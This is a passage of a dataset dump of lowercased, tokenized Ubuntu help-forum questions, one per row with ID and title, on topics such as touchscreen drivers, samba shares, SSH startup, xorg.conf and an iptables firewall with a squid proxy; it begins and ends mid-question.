bindir/startcp.orig > $ bindir/startcp # set any necessary permissions chmod a+x $ bindir/twcalib chmod a+x $ bindir/twxinputinstall.perl chmod u+x $ bindir/remove chmod a+x $ bindir/startcp # copy the default xorg.conf if [ $ xcopydefault == 1 ] then $ bindir/twxinputinstall.perl -find if [ $ ? == 1 ] then cp -a xorg.conf.orig $ xorgconf fi fi usually puts out this error , although i do n't think the error 's are critical ( warnings ? ) update-rc.d : warning : /etc/init.d/twdrvstartup missing lsb keyword 'required-start' update-rc.d : warning : /etc/init.d/twdrvstartup missing lsb keyword 'required-stop' update-rc.d : warning : twdrvstartup start runlevel arguments ( 2 3 4 5 ) do not match lsb default-start values ( 2 5 ) update-rc.d : warning : twdrvstartup stop runlevel arguments ( 0 1 6 ) do not match lsb default-stop values ( 0 1 3 4 6 ) ln : creating symbolic link `/home/kioskadmin/desktop/twscreen/twmonitor ' : file exists root @ kiosk1 : /home/kioskadmin/desktop/twscreen # i also asked this question on super user quite a long time ago , although other than the link to the ubuntu forums , nothing . and no one on the ubuntu irc was very helpfull beyond pointing me to the same post . it seems touchscreens is on of those specialist things that not a lot of people know much about . so my questions 1 any tips to get this to work correctly ? my major problem seems to be the newer boot process in 10.04 2 any alternative calibration software or touchscreen driver that may work or is worth trying ? ( serial , not usb ) . it seems that the the driver is not initiating correctly.. the calibration software and control panel do not detect the controller for some reason . my assumption as the moment is that the init script is not correct ... most likely due to changes in ubuntu 's start up process edit : it seems i can now run the control panel script correctly , i was having problems with java but i just had to exicute it differently . now i problem i the control panel and calibration software can not detect the touchscreen , everthing runs but just cant find it even though its connected and it responds if i enable the sceen manually . the error is , `` touchscreen 1 is not present '' ... . ( also there doenst seem to be a touch screen tag )
3773	multiple shortcuts for same functionality	i really like some of my shortcuts but i find at times there are other ways i would like to invoke the same shortcut . for example : ctrl + alt + left/right switches workspaces left/right respectively . i want a mouse click to perform this same functionality . my mouse wheel can go left/right and i want to map this to go left/right in my workspaces but i also want the keyboard shortcut to remain .
3778	good text editor for ruby on rails programming ?	i 'm trying to find a text editor that i can use for doing ruby on rails development . i have been using textmate on my mac and would love to find something that even comes close to that experience . my ubuntu laptop is a little old , and does n't have a lot of memory , so i need something lightweight . i do n't need/want a bloated ide because the performance on my slow laptop would be terrible . it would be nice if this text editor had : syntax highlighting a project/file browser view to be able to open files in my project keyboard shortcuts ( do n't need them as much )
3780	how to make hp ir6 remote control work ?	i 've been using an hp pavillion dv4-1430us laptop with ubuntu 10.04 installed on it . i want to use the ir6 remote control that comes with the laptop on my ubuntu . however , i 've failed to do so after several attempts . could anyone please let me know about the complete and detailed procedure to get the remote working in ubuntu 10.04 ?
3781	does ubiquity support installing via pxe ?	i have a pxe server at home for doing network-based installs , which uses the text-based alternate installer . however in 10.10 the ubiquity ( aka graphical ) installer has some really nice features ; like installing in the background while i fill out my user information , installing updates as part of the install , and it looks pretty great . is there a way to set up netboot with ubiquity so i can use my existing pxe server but have a nice graphical installation ?
3782	smartphones and ubuntu	it is time for a new cell phone and i am facing the difficult question : which one ? i would like to get a smartphone and am now browsing around the web to see which smartphone provides the best support for ubuntu and can synchronizes best with ubuntu . any tips , info and experience to share ?
3796	in regards to memory usage , what are buffers ?	just took a look at the memory usage ( with free -m ) on one of my ubuntu servers and saw this : total used free shared buffers cached mem : 751 624 127 0 256 236 -/+ buffers/cache : 131 619 swap : 299 0 299 what is a buffer ? if something needed ram to process something , would a buffer give up its allotment ( like cache would ) ? is there any way i can find what 's using the 256mb of memory for buffer ? should i be worried ?
3804	can you install ubuntu from a livecd via vnc or similar ?	it is possible with other distros ! if so , how do you do it ?
3805	how can i reduce the time taken to login by postponing/delaying some startup applications ?	i have setup some applications to startup on each login ( e.g. , redshift-gtk , gtg ) automatically but after adding these to startup applications ( system - > preferences - > startup applications ) obviously the time taken to login has increased . due to all this the time it takes for my panels , desktop etc to appear is too long - until which i am forced to wait . i do n't need these apps to be available immediately , but it would be good if they startup eventually , meanwhile the ubuntu menu/panel is available for running other apps that i might need to . i tried using at command , with the intention of editing all startup applications to put the commands in the at queue , but this did n't work since the apps do n't get the necessary environment variables ( like display ) . is this what nice command is used for ? any other ideas how i can accomplish this ? if possible , i would like to avoid editing the startup applications commands , since this would mean a lot of effort to replicate on other machines i use .
3807	how to check if network proxy is really applied ?	i 'm trying to set network proxy to use my lan 's internet connection to update packages . while the proxy settings works on my firefox , but the package manager still can not connect to internet . i have set proxy in system > > preferences > > network proxy and i have entered the user/pass for the proxy in 'details ' too . how can i make sure that the proxy network is applied correctly ?
3815	how to share files between ubuntu and osx ?	is there any links/tutorials/videos that helps me share files between ubuntu and mac osx ?
3817	text box select issue	i have this issue where the entire text in text boxes is selected whilst i 'm typing in it . for example , in firefox search box i 'd try to type `` foo '' but end up with `` o '' because i managed to type `` fo '' before everything was selected , and then typed `` o '' which replaced the `` fo '' . when it happens , it is incessant - not just a one-off . but it does n't happen all the time , and i have n't managed to figure out what causes it to start and stop . is this a known problem with an easy solution ? edit : this has nothing to do with touchpad . i get this occasionally even on a machine without one . i can usually rectify the issue just be alt-tabbing about a few times .
3818	vb.net programming in ubuntu	i have just started at sixth form college , and i 'm going to take a computing a-level . i have been informed all the programming in the first year is in vb.net on windows ( i believe you are allowed more freedom in the second year ... ) i do have a windows xp partition and you can download visual basic express edition for free , however i would like to know to what extent am i likely to be able to use ubuntu ( mono or anything else ) for my studies ? can anyone give me any pointers of where to start ? realistically if this is to work i need to be able to use the same files/projects/whatever on both ubuntu and windows - so i can work from windows machines at college , and more importantly so teachers can look at and mark my work ! ( i do n't really want to make a point of asking my teacher about my ubuntu use , i 'd prefer to blend in and be a normal student ... )
3830	how can i use networkmanager in gdm ?	i need to connect to a specific wireless network before being able to successfully connect to my user account , since it needs access to a secured ldap server . the same applies when i am outside of the office , where i need to connect to a vpn before i can log in .
3832	how to remove envelope from indicator applet without uninstalling the indicator-messages package ?	i am tired of the envelope in the indicator applet ( also known as the messages menu ) because i do n't use it so i would like to get rid of it but i do n't have root access so i ca n't remove it by uninstalling the indicator-messages package . is there another way to disable this applet ? does n't the indicator applet offer a way to select which indicator is displayed or not ?
3834	lenovo thinkpads , brightness function keys make two steps instead of one , looking for workaround	do you know any workaround for this very long lasting bug buried somewhere in kernel or in gnome-power-manager , please ? thanks in advance . see description : https : //bugzilla.gnome.org/show_bug.cgi ? id=579224
3837	ubuntu finances and future of project	what are the chances that the ubuntu project will die if its primary source of funds are removed ? in other words , how healthy are the finances of the ubuntu sponsors canonical ? is ubuntu losing money ?
3841	desktop does n't remember brightness settings after a reboot	every time i reboot my machine the brightness goes back to 100 % in gnome . i wish it would keep the last setting . is there anyway ?
3850	how can i audit users and access attempts to ssh on my server ?	i 've had a few security problems with a server of mine , a few ssh users have been setting up fires aka giving problems . i would like to : track user logins and logouts track activity of these ssh , in order to discover any malicious activity prevent users from deleting logs i am not much of a sys admin and i am quite inexperienced in this matter , so any kind of advice would be very welcome and very helpful . : )
3856	how can i configure ubuntu to report its hostname to windows ?	how can i configure ubuntu server to report its hostname in such a way that typing http : //thehostname/ in a web browser will connect to apache running on my windows machine . this question is not about configuring apache , but more specifically getting myhostname to resolve to the machine 's ip address from a computer running windows . extra information : i am running ubuntu server 10.04.1 32bit with minimal changes from default . the most notable change is enabling ufw .
3860	auto-start service on bootup that depend on network	i have a particular service ( in this case openfire ) that runs at startup . when it starts , it attempts to connect to a database at a given hostname . at startup time it fails to connect to that database because it can not find the host in dns . my best guess is that this service is executing on startup before networking has initialized and dns servers have been obtained from dhcp . is there any way to specify startup service dependencies that must be met before executing the /etc/init.d/ script ?
3863	script to dial 3g link in case network is down ?	i want to set up an ubuntu router with automatic fail-over to a 3g link . i can probably set up routing and link aggregation , but i do n't know how to monitor link status and dial the 3g link in case it is down . pointers to helpful resources greatly appreciated .
3865	how to find ( and delete ) duplicate files	i have a largish music collection and there are some duplicates in there . is there any way to find duplicate files . at a minimum by doing a hash and seeing if two files have the same hash . bonus points for also finding files with the same name apart from the extension - i think i have some songs with both mp3 and ogg format versions . i 'm happy using the command line if that is the easiest way .
3869	laptop 's internal bluetooth not being recognised by ubuntu : how to diagnose the problem ?	i have an acer aspire 4810t with ubuntu 10.04 installed on it . fn+f3 should turn on/off the internal bluetooth receiver . but it does nothing . the `` bluetooth '' menu in system > preferences says `` your computer does not have any bluetooth adapters plugged in '' . i have bluez and bluez-utils installed . other people have reported that bluetooth works out of the box on the timeline series of laptops with ubuntu . ( although others say that upgrading to a newer version of ubuntu rather than doing a fresh install can break things ... ) various things i 've read on forums that it is suggested i try have failed . hcitool dev gave an empty output ( just a line that said `` devices '' and nothing else . ) hciconfig finished with no output . lshw | grep bluetooth -a15 also finished with no output . i 'm not sure what the next step is in diagnosing what the problem is . what can i do now to figure out where the problem is ?
3870	moving wubi installed on an external hard drive to a laptop	i downloaded the 64-bit iso of ubuntu , mounted it with daemon tools , and installed it on an wd 500 gb `` my passport '' hard drive . i did this with the drive attached to my desktop machine . when i rebooted the desktop , it asked me if i wanted to boot into ubuntu or not . now , my thinking was `` if i plug this drive into my laptop , it should give me the same ubuntu option '' ... .yeah , not so much . it just boots straight into windows vista . i tried changing the boot order on the laptop ( it 's a toshiba ) , but there was no option for booting from usb . this may be the true problem . if it is , i 'll take that issue to superuser . : d anyone have any suggestions to solve my issue ?
3872	usb storage device automount	under ubuntu 10.04 one of the problems which appeared is that usb devices would no longer automatically mount when plugged in . normally i would get a pop up message asking what application i wanted to open the newly plugged in device with , however now that does n't happen . this happens regardless of the way the device is formatted ( ntfs or fat32 ) and all other usb devices ( printer , keyboard and mouse ) work perfectly . my current solution is the mount them manually using sudo mount dev/ ... /medai/ ... however to be honest i 'm just getting tired of having to do this . i 'm happy to post any extra information you are likely to need . i know there will be lots of places i could look to find out what 's going wrong but i have no idea where to start really .
3877	does preload in conlict with other read-ahead type processes ?	i would assume not as preload is installed to use idle priority . though i wonder if it is a duplication of efforts with other processes installed in ubuntu . does anyone have any more information ?
3879	restore gnome bookmarks with passwords	i have a bunch of bookmarks in my laptop , i know i can copy ~/.gtk-bookmarks to my desktop but i have to re-entry all the passwords for ftp , ssh , etc ... is there a way i could restore the bookmarks along with theirs respective passwords . my username/id is the same in both computers and both keyrings are unlocked on login . any help ?
3880	best alternative of itunes for the use of ipods	i have a large music collection on an external drive , and until i installed ubuntu , my preferred music player was itunes . i am currently using rythymbox . is there a program that is better for listening , loading onto ipods , and general organization ?
3883	how to recover deleted files ?	are there any tools , methods , incantations to recover recently deleted files on ubuntu ? if it makes any difference , i want to recover a keepass 2.x database file . but would be better to have a method/tool that works on any kind of file .
3899	how do i make xinput mouse settings persistent for a usb mouse ?	i use xinput to change the settings of my usb mouse : xinput set-ptr-feedback 'usb optical mouse ' 4 1 1 how can i make these settings persistent after unplugging the mouse or rebooting ?
3913	start ssh server on boot	i 've been doing my google-fu , but i can only find outdated guides or guides pertaining solely to the server variations of ubuntu . i need to set it up so that ssh server is run on boot , so i can access the computer remotely without having to first physically log in on the host computer . how would i do that ? i already have ssh server set up so that i can log in and all that , but first i would have to log in on the host and run sudo /etc/init.d/ssh start
3915	list of twitter clients that support oauth ?	can we get a list of twitter clients that support oauth going ? gnome : gwibber kde : choqok source > = beta 3 has oauth air : tweetdeck twhirl
3920	my computer does not want to start-up	i copied photos onto my notebook hard drive and got a warning of limited hard drive space ... i continued to copy photos onto my hard dirve . i got a message that the space limit was reached an no more photos could be copied onto the hard drive . i restarted my notebook and the initial ubuntu page could not load due to lack of memory . i tried to start-up in safe mode , buit to no avail . i guess that will mean that i uninstall ubuntu completely and reinstall it again . i have all important stuff backed up in case i need to unistall ubuntu . my screen is black at the moment with my computer name prompting for the password . when i type in the password i get a message '' the configuration defaults for gnome power manager have not been installed correctly . see administrator . '' what can i do and how do i do it ?
3924	disable `` ondemand '' cpu scaling daemon	i have a server that , as of the upgrade to 10.04 , is now running the `` ondemand '' cpu scaling daemon . why would it automatically install this ? i do n't want my server saving power at the expense of performance .
3929	will the new open source broadcom drivers be available in the current lts release ?	i just found out that broadcom has released a set of open source drivers for their wireless cards . i know that the ubuntu kernel team keeps a package of backported drivers for lts 10.04 . is the driver mature enough to be included in an update for lts users , or will they have to wait for 10.10 ? update for users who might be affected : how can i tell if i have a broadcom wireless card ?
3933	slow wifi with d-link dwa-160 a2	i recently bought a usb wifi adapter for my new desktop computer . it 's a d-link dwa-160 a2 . from the start it did n't want to work at all , but after unplugging and then plugging it back in , it seems to work . however , my browsing is painfully slow . networkmanager reports the connection to be at around 78-85 % signal strength , which seems perfectly acceptable . is there anything i can do to make it faster ? i 'm dual booting with windows 7 , where it seems to work fine , so i 'm guessing that the problem occurs because of crappy drivers .
3934	is it possible to use remote desktop from windows 7 to ubuntu ?	i 'm brand new to ubuntu and linux in general and i installed ubuntu on a second pc ( just to be sure that if i mess something up , i still have my windows 7 pc ) . is there an easy way for me to use remote desktop or an equivalent on my windows 7 pc to connect to my ubuntu pc ? i want to be able to work on ubuntu without having two keyboards/mice . so far , what i 've found on the web take for granted that i 'm already good with linux , which is not my case . so i 'm looking for a answer for dummies . ; )
3939	x61 fingerprint reader as a scanner ?	i 've got an x61 tablet pc with fingerprint reader , and i want a way to see the image ( ? ) scanned when i swipe my finger . obviously i can use it for login - i do n't really care about that , it 's easier for me to type my password . i just want to be able to see the fingerprint it gets .
3940	how do i get the wacom zoom wheel working ?	i 'm trying to get the zoom wheel on my wacom bamboo to work . though i have very little idea of how to do so . i tried using xinputwacom ( i think ) however it moaned it was missing something . is there anyway of running wacom-tools on 10.04 ? a bit more reading here on wacom-tools http : //who-t.blogspot.com/2010/09/wacom-support-in-linux.html
3942	should n't tasksel be installed by default ?	it just is n't there on the base install of a virtual host i am evaluating from an isp . not in path : root @ vpstest2 : ~ # tasksel -bash : tasksel : command not found config files not there : root @ vpstest2 : ~ # ls /usr/share/tas* ls : can not access /usr/share/tas* : no such file or directory it 's just ... . gone ! root @ vpstest2 : ~ # whereis tasksel tasksel : i 'm a little concerned that the install is broken . running locate spews this out : locate : can not stat ( ) `/var/lib/mlocate/mlocate.db ' : no such file or directory
3944	music player that can access/catalog music on network drive	i have all of my music on a network drive hooked up to an ubuntu server . i can access the music from my ubuntu laptop . the problem is that i ca n't find a program that will use my samba connection to access the music directly . any suggestions ?
3945	what are the common maintenance tasks ?	when i was using windows , i used to run defrags , ccleaner and revouninstaller once a month to keep the system and the registry clean . i know ubuntu ( and all linux distro ) has a different system structure and doesnt need defrags , but i 've heard there are some mainenance tasks that help to keep the system clean ( for example , sudo apt-get clean or sudo apt-get autoremove ) how many of those commands/software ( and please explain what they do and if they can compromise the system stability ) do you know and use regularly ?
3949	how to open a remote session ?	earlier , i was trying to find a way to connect to ubuntu from windows 7 : http : //ubuntu.stackexchange.com/questions/3934/is-it-possible-to-use-remote-desktop-from-windows-7-to-ubuntu-10-04 the solution was simple enough , i installed tightvnc viewer on win7 and i can see/control the current ubuntu session . the problem is , if there 's no active session , i can not connect to ubuntu using tightvnc . my goal is to be able to use ubuntu that is installed on a computer in the basement from my windows computer that is on another floor . both computers are on the same lan . ubuntu pc will not have a monitor , keyboard or mouse plugged on it . ( currently , while i 'm configuring things , it does have those but i want to get rid of it as soon as possible . ) is there anyway to get ubuntu to start a session from my windows 7 pc without having to log in directly on the pc first ? like i can do with two windows pc using remote desktop , i can open a session on a remote computer and the desktop take the same screen resolution as the `` host '' computer . by the way , i 'm a total noob with linux and ubuntu . i got my `` for dummies '' book , but it seems that i 'm already trying to do things that are not discussed in the book ! thanks for your help !
3954	nvidia 173 drivers/nvidia-settings are never loaded on boot	it seems while the 173 driver is installed , my resolution settings are not loaded when i log in or reboot . i 've tried opening nvidia-settings as superuser and user , changed the resolution , applied , then saved it to the default xorg conf file ( while giving my password when needed. ) . nothing i do seems to fix this issue . if anyone could help , that 'd be great . ( running the equivelant of ubuntu 10.04 i think , when i 'm actually on mint . ( kernel 2.6.32-24-generic # 42-ubuntu ) xorg.conf file : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 1.0 ( buildd @ palmer ) fri apr 9 10:35:18 utc 2010 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell d1028l '' horizsync 30.0 - 69.0 vertrefresh 48.0 - 120.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce fx 5500 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` 1024x768 +0+0 '' subsection `` display '' depth 24 endsubsection endsection
3956	is there a sop cast player available ?	is there a good sopcast player for ubuntu ?
3958	can not ssh/ping an ubuntu machine over wifi	i have an ubuntu 10.04 running on a laptop , connected to a local network via wifi . this machine does not respond to pings/ssh connect requests , as if it was firewalled . however , if i ssh from this laptop to another machine on the local network , let 's call it b , then , while ssh connection is active , i can ping the laptop from b . any suggestions where to look for the problem ?
3981	start a second x session with different resolution and sound	i have two screens hooked together with twinview . some applications treat it as one big 3840*1200 panel but that 's pretty undesirable in first person shooters as your sights end up in the gap between the two screens . so i usually run wine games in a 1920*1200px window . the window manager makes it full-screen on one screen and that works great for some games . however some games lag and that allows the mouse to fly out the side of the wine window , causing my player to spin like a fox on drugs . and then there are a whole load of native games ( x3 , openarena , quake4 , quakewars , etc ) that do n't have a good windowed mode . using windowed mode on x3 results in the mouse becoming uber-sensitive . would n't it be nice if i could launch some games in a new x session that just used one screen ? ! it would . i 've got as far as this for steam : # ! /bin/sh x :3 -ac & nvidia-settings -- load-config-only sleep 10 # wait for x to catch up cd ~/.wine/drive_c/program\ files/steam/ display=:3 winedebug=-all wine `` steam.exe '' now this technically uses two screens but when games launch in fullscreen mode once they 've already been set to 1920*1200 , they seem to adapt and use one of my xorg.conf metamodes . it would be better if i could explicitly state the mode in this executable . is there a way to do that ? there 's also no sound . i 've got the winepulse patch so i just need to get pulseaudio hooked into this session ( or vice versa ) and i 'm good to go for now , i think . edit : ralf picked up on a few things but missed ( or misconstrued ) some others . this is probably down to my over-verbose question . despite the length of the post , i only have two problems . here are my problems in a succinct setting : how can i start a new x session with a specified resolution ? i would preferably like to specify an existing metamode or the exact resolution when i call x . how can i get applications on the new x session talking with the right pulseaudio server ? at the moment , they do n't seem to line up . i 've tested this with totem , not just wine apps .
3982	is there a significant disadvantage to aliasing rm to do something else ?	i 've been bitten a few times recently with rming things i should n't have - for example , forgetting to ulink symlinks , not rm them . i 'm thinking of writing a small bash script to simply move the target to ~/.local/share/trash , as i have n't grasped restoring files ( seems to involve a lot of linux hackery that i 'm not going to achieve any time soon ) . the only problems i can think of are : scripts/applications needing to rm files ( really a problem ? i could also get used to calling rm ! or something ) , files being moved to trash while files there already have the same name ( not sure how ubuntu get 's around that at the moment , could be fixed by appending md5 ( name + time ( ) ) to the name . of course the real answer 's in backing up or just learning not to do silly things but i 'd like an accommodating solution none-the-less . is this a really terrible idea or something that could be done ?
3983	what does the ctrl-alt-+ shortcut do ?	simple question . i was about to assign the ctrl+alt++ keyboard shortcut to increase the volume , but i then realized it was already assigned for something . if i press this key combination the screen flashes black for a second , and then comes back . pressing ctrl+alt+- produces similar behavior . so i 'm curious , what 's this shortcut supposed to do ?
3986	samba share not allowing username to be entered	i have two samba shares . one a public ( local network ) that anyone can see and change , this works great . i have another share that i want the username and password to be entered [ media ] comment = public share path = /mnt/media_files public = yes read only = no writeable = yes create mask = 0777 directory mask = 0777 force user = nobody force group = nogroup guest ok = yes [ webroot ] comment = apache web root folder path = /var/www public = yes read only = no writable = yes create mask = 0777 directory mask = 0777 guest ok = no i did have `` force user = jon '' as well but did n't seem to help . the issue i have at the moment is that when i go to the share `` \myip\webroot '' i get the popup asking for the password , but the username is grayed out with `` ip\guest '' . how can i get it to either allow me to enter the username , or force it to just use `` jon '' . loging in from windows7 machine seems to work better after fixing an issue with the smpasswd part . i set the password the same as my username accuont on w7 machine and all was good . has a bit of an issue from other machines have to login with ip\jon otherwise it sets the domain to be the name of that computer . testparm output : [ global ] server string = % h server ( samba , ubuntu ) security = share map to guest = bad user obey pam restrictions = yes passdb backend = tdbsam pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . unix password sync = yes syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 dns proxy = no usershare allow guests = yes panic action = /usr/share/samba/panic-action % d [ media ] comment = public share path = /mnt/media_files force user = nobody force group = nogroup read only = no create mask = 0777 directory mask = 0777 guest ok = yes [ webroot ] comment = apache web root folder path = /var/www valid users = jon force user = jon read only = no create mask = 0777 directory mask = 0777 guest ok = yes
3996	how to mount a digital camera for the right applications ?	whenever i plug by digital camera in , a nice media-icon pops up . great ! ! when i right click on this icon , i can only open rhythmbox or vlc-media-player . both applications are rather senseless to be used here . when i want to download photos ( be it by means of f-spot , shotwell or picasa ) i have to unmount the camera first . this seems to me rather illogical ? why is the camera mounted if you have to unmount it to be used ? how can i make that the digital camera is being mounted for the right applications ? it looks strange to me that one has to unmount a device before one can use it ! camera model : canon powershot sx20 is ( new id has been added for this camera in libgphoto2 2.4.9 . the packagemanager tells me that libgphoto2-2 is installed , version 2.4.8-0ubuntu2 = > it looks like libgphoto2 ca n't read the camera ? anyway , the ptp/mtp- mode works fine ) uname -a linux ubuntu-bernard **2.6.32-24-generic # 42-ubuntu** smp fri aug 20 14:24:04 utc 2010 i686 gnu/linux cat /etc/lsb-release distrib_id=ubuntu distrib_release=10.04 distrib_codename=lucid distrib_description= '' **ubuntu 10.04.1 lts** '' lsusb bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 005 : id 04a9:31e4 **canon , inc.** bus 001 device 003 : id 0b05:1706 asustek computer , inc. wl-167g 802.11g adapter [ ralink ] bus 001 device 002 : id 050d:0234 belkin components f5u234 usb 2.0 4-port hub bus 001 device 001 : id 1d6b:0001 linux foundation 1.1 root hub type filesystem = **gphoto2** kernelloggings ( plug-in/plug-out ) sep 11 19:23:55 ubuntu-bernard kernel : [ 1370.156803 ] usb 1-2.1 : new full speed usb device using uhci_hcd and address 4 sep 11 19:23:55 ubuntu-bernard kernel : [ 1370.282419 ] usb 1-2.1 : configuration # 1 chosen from 1 choice sep 11 19:31:59 ubuntu-bernard kernel : [ 1854.101144 ] usb 1-2.1 : usb disconnect , address 4 detailled camera info lsusb -v bus 001 device 007 : id 04a9:31e4 canon , inc. device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x04a9 canon , inc. idproduct 0x31e4 bcddevice 0.02 imanufacturer 1 canon inc. iproduct 2 canon digital camera iserial 3 e2f5e9b80a584ffda901b46ecbc87410 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 39 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xc0 self powered maxpower 2ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 3 binterfaceclass 6 imaging binterfacesubclass 1 still image capture binterfaceprotocol 1 picture transfer protocol ( pima 15470 ) iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 32 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 bnumconfigurations 1 device status : 0x0001 self powered
3998	how can i install matlab from the mathworks website ?	when downloading matlab from the mathworks website , i am prompted to download an .flp file . when i open this java file i shortly see a screen where some data is processed and after that nothing ever happens again . does anybody have an idea how to install matlab this way ?
4000	how can i tell if i have a broadcom wireless card ?	i just read that broadcom has open-sourced their wireless adapter drivers and was curious if this would have any affect on my dell xps m1330 which sometimes has flaky wifi .
4002	effects for jokosher	i 've installed jokosher and all the ladspa effects i could see , but when i try to add an effect to a track jokosher says none are installed . do i need some extra gstreamer package to make this work ?
4010	iptables issue with squid as transparent proxy	i have an ubuntu ( 10.04 ) machine that is running my firewall , dhcp and dns . i just installed squid from packages and set it to run on port 8888 . before any changes to my firewall the webpages will work normally , if i manually set a proxy to 192.168.10.1:8888 on firefox it works . the issue happens when i try and turn squid into a transparent proxy . my firewall is as follows : # ! /bin/sh iptables= '' /sbin/iptables '' modprobe= '' /sbin/modprobe '' depmod= '' /sbin/depmod '' extif= '' eth1 '' intif= '' eth2 '' load ( ) { $ depmod -a $ modprobe ip_tables $ modprobe ip_conntrack $ modprobe ip_conntrack_ftp $ modprobe ip_conntrack_irc $ modprobe iptable_nat $ modprobe ip_nat_ftp $ modprobe ip_conntrack_pptp $ modprobe ip_nat_pptp echo `` enable forwarding ... '' echo `` 1 '' > /proc/sys/net/ipv4/ip_forward echo `` enable dynamic addr '' echo `` 1 '' > /proc/sys/net/ipv4/ip_dynaddr # start firewall # default policies $ iptables -p input drop $ iptables -f input $ iptables -p output drop $ iptables -f output $ iptables -p forward drop $ iptables -f forward $ iptables -t nat -f echo `` opening loopback interface for socket based services . '' $ iptables -a input -i lo -j accept $ iptables -a output -o lo -j accept echo `` allow gre 47 for vpn '' $ iptables -a input -p 47 -j accept echo `` allow all connections out and only existing related ones in '' $ iptables -a input -i $ intif -j accept $ iptables -a input -m state -- state established , related -j accept $ iptables -a output -o $ extif -j accept $ iptables -a output -m state -- state established , related -j accept $ iptables -a forward -i $ extif -o $ intif -m state -- state established , related -j accept $ iptables -a forward -i $ intif -o $ extif -j accept $ iptables -a forward -j log -- log-level 7 -- log-prefix `` dropped by firewall : `` $ iptables -a input -j log -- log-level 7 -- log-prefix `` dropped by firewall : `` $ iptables -a output -j log -- log-level 7 -- log-prefix `` dropped by firewall : `` echo `` enabling snat ( masquerade ) functionality on $ extif - allow lan internet access '' $ iptables -t nat -a postrouting -o $ extif -j masquerade $ iptables -a input -i $ intif -j accept $ iptables -a output -o $ intif -j accept echo `` allowing packets with icmp data ( pings ) '' $ iptables -a input -p icmp -j accept $ iptables -a output -p icmp -j accept $ iptables -a input -p udp -i $ intif -- dport 67 -m state -- state new -j accept echo `` port 137 for netbios '' $ iptables -a input -i $ intif -p udp -- dport 137 -j accept $ iptables -a output -o $ intif -p udp -- dport 137 -j accept # echo `` port 139 for netbios-ssn smb '' # $ iptables -a input -i $ intif -p tcp -- dport 139 -j accept # $ iptables -a output -o $ intif -p tcp -- dport 139 -j accept echo `` opening port 53 for dns queries '' $ iptables -a input -p udp -i $ extif -- sport 53 -j accept echo `` opening port 22 for internal ssh '' $ iptables -a input -i $ intif -p tcp -- dport 22 -j accept echo `` opening port 80 for webserver '' $ iptables -a input -p tcp -i $ extif -- dport 80 -m state -- state new -j accept echo `` opening port 21 for ftp server '' $ iptables -a input -p tcp -i $ extif -- dport 21 -m state -- state new -j accept echo `` opening ssh for web on port 2609 for firewig '' $ iptables -a input -p tcp -- dport 2609 -j accept $ iptables -a output -p tcp -- dport 2609 -j accept echo `` opening ssh for web on port 22 for ws2008-ci '' $ iptables -a prerouting -t nat -i $ extif -p tcp -- dport 22 -j dnat -- to 192.168.10.97 $ iptables -a forward -p tcp -m state -- state new -d 192.168.10.97 -j accept echo `` opening ssh for web on port 2302 for firewig 2302 '' $ iptables -a prerouting -t nat -i $ extif -p tcp -- dport 2302 -j dnat -- to 192.168.10.96:2302 $ iptables -a forward -p tcp -m state -- state new -d 192.168.10.96 -- dport 2302 -j accept echo `` opening apache webserver for hoh '' $ iptables -a prerouting -t nat -i $ extif -p tcp -- dport 80 -j dnat -- to 192.168.10.96:80 $ iptables -a forward -p tcp -m state -- state new -d 192.168.10.96 -- dport 80 -j accept # echo `` opening hudson '' # $ iptables -a prerouting -t nat -i $ extif -p tcp -- dport 81 -j dnat -- to 192.168.10.97:81 # $ iptables -a forward -p tcp -m state -- state new -d 192.168.10.97 -- dport 81 -j accept echo `` opening target process '' $ iptables -a prerouting -t nat -i $ extif -p tcp -- dport 90 -j dnat -- to 192.168.10.98:90 $ iptables -a forward -p tcp -m state -- state new -d 192.168.10.98 -- dport 90 -j accept # echo `` this is designed to stop brute force attacks '' $ iptables -i input -p tcp -m state -- state new -m limit -- limit 6/minute -- limit-burst 5 -j accept # echo `` setting up squid proxy server '' # $ iptables -t nat -a prerouting -i $ intif -p tcp -- dport 80 -j dnat -- to 192.168.10.1:8888 # $ iptables -t nat -a prerouting -i $ extif -p tcp -- dport 80 -j redirect -- to-port 8888 # $ iptables -t nat -a prerouting -i $ intif -p tcp 